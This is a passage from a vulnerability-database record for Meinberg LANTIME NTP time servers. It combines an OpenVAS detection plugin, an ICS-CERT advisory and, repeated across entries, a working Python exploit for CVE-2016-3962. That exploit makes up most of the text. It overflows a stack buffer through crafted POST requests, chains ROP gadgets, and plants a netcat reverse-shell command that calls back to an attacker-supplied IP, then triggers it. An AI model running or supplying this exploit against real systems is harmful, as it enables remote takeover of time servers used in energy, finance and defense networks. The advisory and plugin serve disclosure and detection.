struct.pack(\"I\", ret ) * (71/4)\r\n \r\nmsg += struct.pack(\"I\", send_cmd )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", 0x800120f5 ) # [eax + 0x60]\r\nmsg += struct.pack(\"I\", some_str ) # buffer\r\nmsg += struct.pack(\"I\", 0xffffffff ) # count\r\nmsg += \"E\" * 120\r\n \r\nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx\r\nmsg += struct.pack(\"I\", some_str - 100 ) # esi\r\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\r\nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret\r\nmsg += \"A\" * 100\r\n \r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close()\r\n \r\ntime.sleep(1)\r\n \r\n \r\nprint \"[+] cleaning up\"\r\n###################################################################\r\n#\r\n# Kill all mains that are hung-up\r\n#\r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n \r\nparam = \"A\" * 0x2850\r\n \r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n \r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\n \r\ncommand = 'killall main'\r\n \r\nmsg = \"button=\" + \"A\"*10028\r\nmsg += struct.pack(\"I\", system )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", some_str )\r\nmsg += command + \"\\x00\"\r\n \r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close()\r\n \r\nprint \"[+] enjoy\"\n\n# 0day.today [2018-04-08] #", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25437"}], "openvas": [{"lastseen": "2020-05-18T17:26:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3989", "CVE-2016-3962", "CVE-2016-3988"], "description": "Meinberg LANTIME is prone to multiple vulnerabilies.", "modified": "2020-05-14T00:00:00", "published": "2016-06-24T00:00:00", "id": "OPENVAS:1361412562310106110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106110", "type": "openvas", "title": "Meinberg LANTIME < 6.20.004 Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Meinberg LANTIME Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106110\");\n script_version(\"2020-05-14T13:01:46+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-14 13:01:46 +0000 (Thu, 14 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-06-24 16:45:17 +0700 (Fri, 24 Jun 2016)\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:N\");\n\n script_cve_id(\"CVE-2016-3962\", \"CVE-2016-3988\", \"CVE-2016-3989\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Meinberg LANTIME < 6.20.004 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_meinberg_lantime_detect.nasl\");\n script_mandatory_keys(\"meinberg_lantime/detected\");\n\n script_tag(name:\"summary\", value:\"Meinberg LANTIME is prone to multiple vulnerabilies.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Meinberg LANTIME is prone to multiple vulnerabilies:\n\n Remote stack buffer overflow vulnerability involving parsing of parameter in POST request in function\n provides privilege of web server 'nobody'. (CVE-2016-3962)\n\n Remote stack buffer overflow vulnerability is present while parsing nine different parameters in POST\n request in function. (CVE-2016-3988)\n\n Weak access controls allow for privilege escalation from 'nobody' to 'root' user. 'nobody' has permissions\n to alter script that can only run as 'root'. (CVE-2016-3989)\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these vulnerabilities could cause a buffer\n overflow condition that may allow escalation to root privileges.\");\n\n script_tag(name:\"affected\", value:\"Version prior to 6.20.004 on IMS-LANTIME M3000, IMS-LANTIME M1000,\n IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200 and LANTIME M100.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Version 6.20.004 or later.\");\n\n script_xref(name:\"URL\", value:\"https://ics-cert.us-cert.gov/advisories/ICSA-16-175-03\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ncpe_list = make_list( \"cpe:/a:meinberg:lantime_m3000\",\n \"cpe:/a:meinberg:lantime_m1000\",\n \"cpe:/a:meinberg:lantime_m500\",\n \"cpe:/a:meinberg:lantime_m900\",\n \"cpe:/a:meinberg:lantime_m600\",\n \"cpe:/a:meinberg:lantime_m400\",\n \"cpe:/a:meinberg:lantime_m300\",\n \"cpe:/a:meinberg:lantime_m200\",\n \"cpe:/a:meinberg:lantime_m100\" );\n\nif( ! infos = get_app_version_from_list( cpe_list:cpe_list, nofork:TRUE ) )\n exit( 0 );\n\nvers = infos[\"version\"];\n\nif( version_is_less( version:vers, test_version:\"6.20.004\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"6.20.004\" );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:N"}}], "ics": [{"lastseen": "2021-02-27T19:53:35", "bulletinFamily": "info", "cvelist": ["CVE-2016-3962", "CVE-2016-39688", "CVE-2016-3988", "CVE-2016-3989"], "description": "## OVERVIEW\n\nIndependent researcher Ryan Wincey has identified a stack buffer overflow vulnerability and a privilege escalation vulnerability in Meinberg\u2019s NTP Time Servers Interface. Meinberg has produced a new Version 6.20.004 to mitigate these vulnerabilities. The researcher has validated the firmware update. He confirms the update fixes these vulnerabilities.\n\nThese vulnerabilities could be exploited remotely.\n\n## AFFECTED PRODUCTS\n\nThe following Meinberg products are affected:\n\n * IMS-LANTIME M3000 Version 6.0 and earlier,\n * IMS-LANTIME M1000 Version 6.0 and earlier,\n * IMS-LANTIME M500 Version 6.0 and earlier,\n * LANTIME M900 Version 6.0 and earlier,\n * LANTIME M600 Version 6.0 and earlier,\n * LANTIME M400 Version 6.0 and earlier,\n * LANTIME M300 Version 6.0 and earlier,\n * LANTIME M200 Version 6.0 and earlier,\n * LANTIME M100 Version 6.0 and earlier,\n * SyncFire 1100 Version 6.0 and earlier, and\n * LCES Version 6.0 and earlier.\n\n## IMPACT\n\nSuccessful exploitation of these vulnerabilities could cause a buffer overflow condition that may allow escalation to root privileges.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nMeinberg is a Germany-based company that maintains offices around the world, including North America, South America, Europe, Asia, Africa, and Australia.\n\nThe affected products are NTP Time Servers. According to Meinberg, IMS-LANTIME, LANTIME, SyncFire, and LCES Series are deployed across several sectors including Communications, Defense Industrial Base, Energy, Financial Services, Transportation Systems, and others. Meinberg estimates that these products are used worldwide.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### STACK-BASED BUFFER OVERFLOWa\n\nRemote stack buffer overflow vulnerability involving parsing of parameter in POST request in function provides privilege of web server \u201cnobody.\u201d\n\nCVE-2016-3962b has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L).c\n\n### STACK-BASED BUFFER OVERFLOWd\n\nRemote stack buffer overflow vulnerability is present while parsing nine different parameters in POST request in function.\n\nCVE-2016-3988e has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/ C:L/I:L/A:L).f\n\n### PRIVILEGE ESCALATIONg\n\nWeak access controls allow for privilege escalation from \u201cnobody\u201d to \u201croot\u201d user. \u201cnobody\u201d has permissions to alter script that can only run as \u201croot.\u201d\n\nCVE-2016-3989h has been assigned to this vulnerability. A CVSS v3 base score of 8.1 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).i\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThese vulnerabilities could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nNo known public exploits specifically target these vulnerabilities.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit these vulnerabilities.\n\n## MITIGATION\n\nMeinberg has produced a new firmware Version 6.20.004. The new firmware can be downloaded by using the link below:\n\n[https://urldefense.proofpoint.com/v2/url?u=http-3A__www.meinberg.de_download_firmware_lantime_v6_firmware-2D6.20.004-2Dx86.rel&d=BQIFaQ&c=54IZrppPQZKX9mLzcGdPfFD1hxrcB__aEkJFOKJFd00&r=zE5lG3CZZIbdBvT6slVAzQ&m=n4ZBSsrF-RphS7eiqohm3WcJ2BYQUCwQUHwVPHNFa6o&s=WlQnlBzw05tnJ1o29nmeXtGBbNubzjyRPqaWAdpXn5Y&e=](<https://urldefense.proofpoint.com/v2/url?u=http-3A__www.meinberg.de_download_firmware_lantime_v6_firmware-2D6.20.004-2Dx86.rel&d=BQIFaQ&c=54IZrppPQZKX9mLzcGdPfFD1hxrcB__aEkJFOKJFd00&r=zE5lG3CZZIbdBvT6slVAzQ&m=n4ZBSsrF-RphS7eiqohm3WcJ2BYQUCwQUHwVPHNFa6o&s=WlQnlBzw05tnJ1o29nmeXtGBbNubzjyRPqaWAdpXn5Y&e=>)\n\nICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * aCWE-121: Stack-based Buffer Overflow, http://cwe.mitre.org/data/definitions/121.html, web site last accessed June 23, 2016.\n * bNVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3962, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * cCVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L, web site last accessed June 23, 2016.\n * dCWE-121: Stack-based Buffer Overflow, http://cwe.mitre.org/data/definitions/121.html, web site last accessed June 23, 2016.\n * eNVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-39688, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * fCVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L, web site last accessed June 23, 2016.\n * gCWE-121: Stack-based Buffer Overflow, http://cwe.mitre.org/data/definitions/121.html, web site last accessed June 23, 2016.\n * hNVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3989, NIST uses this advisory to create the CVE web site report. This web site will be active sometime after publication of this advisory.\n * iCVSS Calculator, https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N, web site last accessed June 23, 2016.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-16-175-03>); we'd welcome your feedback.\n", "modified": "2018-08-23T00:00:00", "published": "2016-06-23T00:00:00", "id": "ICSA-16-175-03", "href": "https://www.us-cert.gov/ics/advisories/ICSA-16-175-03", "type": "ics", "title": "Meinberg NTP Time Server Vulnerabilities", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:12", "description": "", "published": "2016-07-18T00:00:00", "type": "packetstorm", "title": "Meinberg NTP Time Server ELX800/GPS M4x 5.30p Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3962"], "modified": "2016-07-18T00:00:00", "id": "PACKETSTORM:137947", "href": "https://packetstormsecurity.com/files/137947/Meinberg-NTP-Time-Server-ELX800-GPS-M4x-5.30p-Command-Execution.html", "sourceData": "`#!/usr/bin/python \n# \n# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit \n# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/ \n# \n# 271 - trigger notifications \n# 299 - copy user defined notifications \n \n# Kernel Version: 2.6.15.1 \n# System Version: 530 \n# Lantime configuration utility 1.27 \n# ELX800/GPS M4x V5.30p \n \nimport socket \nimport struct \nimport telnetlib \nimport sys \nimport time \n \nif len(sys.argv) < 3: \nprint \"[-] <Host> <Callback IP> \" \nexit(1) \n \n \nhost = sys.argv[1] \ncallback_ip = sys.argv[2] \n \nprint \"[+] exploiting Meinburg M400\" \nport = 80 \n \n################################################################### \n# \n# Copy user_defined_notification to /www/filetmp \n# Append reverse shell string to /file/tmp \n# \ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) \ncsock.connect ( (host, int(port)) ) \n \nparam = \"A\" * 0x2850 \n \nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\" \nresp += \"Host: \" + host + \"\\r\\n\" \nresp += \"User-Agent: Mozilla/5.0\\r\\n\" \nresp += \"Accept: text/html\\r\\n\" \nresp += \"Accept-Language: en-US\\r\\n\" \nresp += \"Connection: keep-alive\\r\\n\" \nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \n \nsystem = 0x80490B0 \nexit = 0x80492C0 \nsome_str = 0x850BDB8 \n \n#must have a listener setup to receive the callback connection on ip 192.168.60.232 \n# i.e. nc -v -l -p 4444 \ncommand = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo \"{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;\" >> /www/filetmp' \n \nmsg = \"button=\" + \"A\"*10028 \nmsg += struct.pack(\"I\", system ) \nmsg += struct.pack(\"I\", exit ) \nmsg += struct.pack(\"I\", some_str ) \nmsg += command + \"\\x00\" \n \nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\" \nresp += msg \ncsock.send(resp) \ncsock.close() \n \ntime.sleep(1) \n \n################################################################### \n# \n# Copy /www/filetmp to user_defined_notification \n# \ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) \ncsock.connect ( (host, int(port)) ) \n \nparam = \"A\" * 0x2850 \n \nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\" \nresp += \"Host: \" + host + \"\\r\\n\" \nresp += \"User-Agent: Mozilla/5.0\\r\\n\" \nresp += \"Accept: text/html\\r\\n\" \nresp += \"Accept-Language: en-US\\r\\n\" \nresp += \"Connection: keep-alive\\r\\n\" \nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \n \nsend_cmd = 0x807ED88 \nsystem = 0x80490B0 \nexit = 0x80492C0 \nsome_str = 0x850BDB8 \nret = 0x804CE65 \n \n#stack pivot \nstack_pivot = 0x8049488 \nmsg = \"button=\" + \"A\" * 9756 \n \nmsg += \"B\" * 28 \nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp \nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret \nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place \nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret \nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret \nmsg += struct.pack(\"I\", ret ) * (71/4) \n \nmsg += struct.pack(\"I\", send_cmd ) \nmsg += struct.pack(\"I\", exit ) \nmsg += struct.pack(\"I\", 0x80012111 ) # [eax + 0x60] \nmsg += struct.pack(\"I\", some_str ) # buffer \nmsg += struct.pack(\"I\", 0xffffffff ) # count \nmsg += \"E\" * 120 \n \nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx \nmsg += struct.pack(\"I\", some_str - 100 ) # esi \nmsg += struct.pack(\"I\", some_str - 100 ) # edi \nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp \nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret \nmsg += \"A\" * 100 \n \nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\" \nresp += msg \ncsock.send(resp) \ncsock.close \n \ntime.sleep(1) \n \n################################################################### \n# \n# Trigger reverse shell \n# \n \ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) \ncsock.connect ( (host, int(port)) ) \n \nparam = \"A\" * 0x2850 \n \nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\" \nresp += \"Host: \" + host + \"\\r\\n\" \nresp += \"User-Agent: Mozilla/5.0\\r\\n\" \nresp += \"Accept: text/html\\r\\n\" \nresp += \"Accept-Language: en-US\\r\\n\" \nresp += \"Connection: keep-alive\\r\\n\" \nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \n \nsend_cmd = 0x807ED88 \nsystem = 0x80490B0 \nexit = 0x80492C0 \nsome_str = 0x850BDB8 \nret = 0x804CE65 \n \n#stack pivot \nstack_pivot = 0x8049488 \nmsg = \"button=\" + \"A\" * 9756 \n \nmsg += \"B\" * 28 \nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp \nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret \nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place \nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret \nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret \nmsg += struct.pack(\"I\", ret ) * (71/4) \n \nmsg += struct.pack(\"I\", send_cmd ) \nmsg += struct.pack(\"I\", exit ) \nmsg += struct.pack(\"I\", 0x800120f5 ) # [eax + 0x60] \nmsg += struct.pack(\"I\", some_str ) # buffer \nmsg += struct.pack(\"I\", 0xffffffff ) # count \nmsg += \"E\" * 120 \n \nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx \nmsg += struct.pack(\"I\", some_str - 100 ) # esi \nmsg += struct.pack(\"I\", some_str - 100 ) # edi \nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp \nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret \nmsg += \"A\" * 100 \n \nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\" \nresp += msg \ncsock.send(resp) \ncsock.close() \n \ntime.sleep(1) \n \n \nprint \"[+] cleaning up\" \n################################################################### \n# \n# Kill all mains that are hung-up \n# \ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM) \ncsock.connect ( (host, int(port)) ) \n \nparam = \"A\" * 0x2850 \n \nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\" \nresp += \"Host: \" + host + \"\\r\\n\" \nresp += \"User-Agent: Mozilla/5.0\\r\\n\" \nresp += \"Accept: text/html\\r\\n\" \nresp += \"Accept-Language: en-US\\r\\n\" \nresp += \"Connection: keep-alive\\r\\n\" \nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \n \nsystem = 0x80490B0 \nexit = 0x80492C0 \nsome_str = 0x850BDB8 \n \ncommand = 'killall main' \n \nmsg = \"button=\" + \"A\"*10028 \nmsg += struct.pack(\"I\", system ) \nmsg += struct.pack(\"I\", exit ) \nmsg += struct.pack(\"I\", some_str ) \nmsg += command + \"\\x00\" \n \nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\" \nresp += msg \ncsock.send(resp) \ncsock.close() \n \nprint \"[+] enjoy\" \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/137947/meinbergntp-exec.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:31", "description": "\nMeinberg NTP Time Server ELX800GPS M4x V5.30p - Remote Command Execution Escalate Privileges", "edition": 1, "published": "2016-07-17T00:00:00", "title": "Meinberg NTP Time Server ELX800GPS M4x V5.30p - Remote Command Execution Escalate Privileges", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3962"], "modified": "2016-07-17T00:00:00", "id": "EXPLOITPACK:D34BF86AC539AEBAEDB8B3FFCD3F9B4B", "href": "", "sourceData": "#!/usr/bin/python\n#\n# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit\n# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/\n#\n# 271 - trigger notifications\n# 299 - copy user defined notifications\n\n# Kernel Version: 2.6.15.1\n# System Version: 530 \n# Lantime configuration utility 1.27\n# ELX800/GPS M4x V5.30p\n\nimport socket\nimport struct\nimport telnetlib\nimport sys\nimport time\n\nif len(sys.argv) < 3:\n\tprint \"[-] <Host> <Callback IP> \"\n\texit(1)\n\n\t\nhost = sys.argv[1]\ncallback_ip = sys.argv[2]\n\nprint \"[+] exploiting Meinburg M400\"\nport = 80\n\n###################################################################\n#\n# Copy user_defined_notification to /www/filetmp\n# Append reverse shell string to /file/tmp\t\n#\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\ncsock.connect ( (host, int(port)) )\n\nparam = \"A\" * 0x2850\n\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\nresp += \"Host: \" + host + \"\\r\\n\"\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\nresp += \"Accept: text/html\\r\\n\"\nresp += \"Accept-Language: en-US\\r\\n\"\nresp += \"Connection: keep-alive\\r\\n\"\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n\nsystem = 0x80490B0\nexit = 0x80492C0\nsome_str = 0x850BDB8\n\n#must have a listener setup to receive the callback connection on ip 192.168.60.232\n# i.e. nc -v -l -p 4444\ncommand = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo \"{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;\" >> /www/filetmp'\n\nmsg = \"button=\" + \"A\"*10028 \nmsg += struct.pack(\"I\", system )\nmsg += struct.pack(\"I\", exit )\nmsg += struct.pack(\"I\", some_str )\nmsg += command + \"\\x00\"\n\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\nresp += msg\ncsock.send(resp)\ncsock.close()\n\ntime.sleep(1)\n\n###################################################################\n#\n# Copy /www/filetmp to user_defined_notification\t\n# \ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\ncsock.connect ( (host, int(port)) )\n\nparam = \"A\" * 0x2850\n\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\nresp += \"Host: \" + host + \"\\r\\n\"\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\nresp += \"Accept: text/html\\r\\n\"\nresp += \"Accept-Language: en-US\\r\\n\"\nresp += \"Connection: keep-alive\\r\\n\"\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n\nsend_cmd = 0x807ED88\nsystem = 0x80490B0\nexit = 0x80492C0\nsome_str = 0x850BDB8\nret = 0x804CE65\n\n#stack pivot\nstack_pivot = 0x8049488\nmsg = \"button=\" + \"A\" * 9756\n\nmsg += \"B\" * 28\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\nmsg += struct.pack(\"I\", ret ) * (71/4)\n\nmsg += struct.pack(\"I\", send_cmd )\nmsg += struct.pack(\"I\", exit )\nmsg += struct.pack(\"I\", 0x80012111 ) # [eax + 0x60]\nmsg += struct.pack(\"I\", some_str ) # buffer\nmsg += struct.pack(\"I\", 0xffffffff ) # count\nmsg += \"E\" * 120\n\nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx\nmsg += struct.pack(\"I\", some_str - 100 ) # esi\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret\nmsg += \"A\" * 100\n\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\nresp += msg\ncsock.send(resp)\ncsock.close\n\ntime.sleep(1)\n\n###################################################################\n#\n# Trigger reverse shell\t\n# \n\t\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\ncsock.connect ( (host, int(port)) )\n\nparam = \"A\" * 0x2850\n\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\nresp += \"Host: \" + host + \"\\r\\n\"\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\nresp += \"Accept: text/html\\r\\n\"\nresp += \"Accept-Language: en-US\\r\\n\"\nresp += \"Connection: keep-alive\\r\\n\"\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n\nsend_cmd = 0x807ED88\nsystem = 0x80490B0\nexit = 0x80492C0\nsome_str = 0x850BDB8\nret = 0x804CE65\n\n#stack pivot\nstack_pivot = 0x8049488\nmsg = \"button=\" + \"A\" * 9756\n\nmsg += \"B\" * 28\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\nmsg += struct.pack(\"I\", ret ) * (71/4)\n\nmsg += struct.pack(\"I\", send_cmd )\nmsg += struct.pack(\"I\", exit )\nmsg += struct.pack(\"I\", 0x800120f5 ) # [eax + 0x60]\nmsg += struct.pack(\"I\", some_str ) # buffer\nmsg += struct.pack(\"I\", 0xffffffff ) # count\nmsg += \"E\" * 120\n\nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx\nmsg += struct.pack(\"I\", some_str - 100 ) # esi\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\nmsg += 